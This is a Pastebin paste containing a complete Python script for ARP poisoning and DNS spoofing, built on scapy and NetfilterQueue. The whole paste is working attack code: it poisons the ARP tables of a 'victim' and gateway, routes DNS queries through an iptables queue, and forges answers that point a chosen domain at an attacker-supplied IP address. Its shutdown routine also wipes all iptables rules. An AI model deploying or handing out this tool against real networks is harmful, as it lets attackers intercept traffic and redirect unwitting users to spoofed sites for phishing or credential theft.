JSchmoe

DNS spoofer

Jan 24th, 2016
344
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. #1. Imports:
  4.  
  5. import logging
  6. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  7. import sys
  8. import time
  9. import threading
  10. import os
  11.  
  12. try:
  13.     from scapy.all import *
  14. except ImportError:
  15.     print("[!]Install scapy to use this module.")
  16.     exit()
  17.    
  18. try:
  19.     from netfilterqueue import NetfilterQueue
  20. except ImportError:
  21.     print("[!]Install NetfilterQueue to use this module.")
  22.     exit()
  23.    
  24. #2. Variables:
  25.  
  26. global victimIP, victimMAC, gatewayIP, gatewayMAC, spoofDomain, spoofIP
  27.  
  28. victimIP = sys.argv[1]
  29. gatewayIP = sys.argv[2]
  30. spoofDomain = sys.argv[3]
  31. spoofIP = sys.argv[4]
  32.  
  33. #3. Functions for ARP spoofing:
  34.  
  35. def getMAC(ip): #Get MAC address using ARP.
  36.     ans, unans = sr(ARP(pdst=ip), timeout=1, retry=0, verbose=0)
  37.     for s, r in ans:
  38.         return r[ARP].hwsrc
  39.        
  40. gatewayMAC = getMAC(gatewayIP)
  41. victimMAC = getMAC(victimIP)
  42.  
  43. try:
  44.     print("[*]Gateway MAC: "+gatewayMAC)
  45.     print("[*]Victim MAC: "+victimMAC)
  46. except:
  47.     print("[!]Error getting MAC address.")
  48.     exit()
  49.        
  50. def poison():#Poison the targets.
  51.     global victimIP, gatewayIP, victimMAC, gatewayMAC
  52.     send(ARP(op=2, pdst=victimIP, psrc=gatewayIP, hwdst=victimMAC), verbose=0)
  53.     send(ARP(op=2, pdst=gatewayIP, psrc=victimIP, hwdst=gatewayMAC), verbose=0)
  54.    
  55. def restore():#Restore ARP tables.
  56.     global victimIP, gatewayIP, victimMAC, gatewayMAC
  57.     send(ARP(op=2, pdst=gatewayIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3, verbose=0)
  58.     send(ARP(op=2, pdst=victimIP, psrc=gatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gatewayMAC), count=3, verbose=0)
  59.    
  60. #4. Functions for DNS spoofing:
  61.  
  62. def modify(packet):
  63.     global spoofDomain, spoofIP
  64.     pkt = IP(packet.get_payload())
  65.     if not pkt.haslayer(DNSQR):
  66.         packet.accept()#Accept if packet is not a DNS query.
  67.     else:#
  68.         if spoofDomain in pkt[DNS].qd.qname:#Modify packet if it matches spoofDomain.
  69.             spoofed_pkt = IP(dst=pkt[IP].src, src =pkt[IP].dst)/\
  70.                 UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  71.                 DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \
  72.                 an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=spoofIP))
  73.             packet.set_payload(str(spoofed_pkt))
  74.             packet.accept()#Make the packet appear legit and sling it back to the victim.
  75.             print("[*]Spoofed request for "+str(pkt[DNS].qd.qname))
  76.         else:
  77.             packet.accept()#Accept if query doesn't match spoofDomain.
  78.        
  79. def listen():
  80.     nfqueue = NetfilterQueue()
  81.     nfqueue.bind(1, modify)#Set up NetfilterQueue
  82.     nfqueue.run()
  83.    
  84. #5. Functions for setting up iptables and such:
  85.  
  86. def start_iptables():
  87.     with open("/proc/sys/net/ipv4/ip_forward", "w") as ipf:
  88.         ipf.write("1\n")
  89.         ipf.close()
  90.     os.system("iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1")
  91.    
  92. def stop_iptables():
  93.     with open("/proc/sys/net/ipv4/ip_forward", "w") as ipf:
  94.         ipf.write("0\n")
  95.         ipf.close()
  96.     os.system("iptables -F")
  97.     os.system("iptables -X")
  98.     os.system("iptables -t nat -F")
  99.     os.system("iptables -t nat -X")
  100.    
  101. #6. Main function:
  102.  
  103. def main():
  104.     t = threading.Thread(target=listen)
  105.     t.daemon = True
  106.     t.start()
  107.     start_iptables()
  108.     print("[*]Starting...")
  109.     while 1:
  110.         try:
  111.             poison()
  112.             time.sleep(1.5)
  113.         except KeyboardInterrupt:
  114.             print("[*]User requested shutdown.")
  115.             stop_iptables()
  116.             restore()
  117.             exit()
  118.            
  119. #7. And here we go!
  120.  
  121. if __name__ == "__main__":
  122.     main()
RAW Paste Data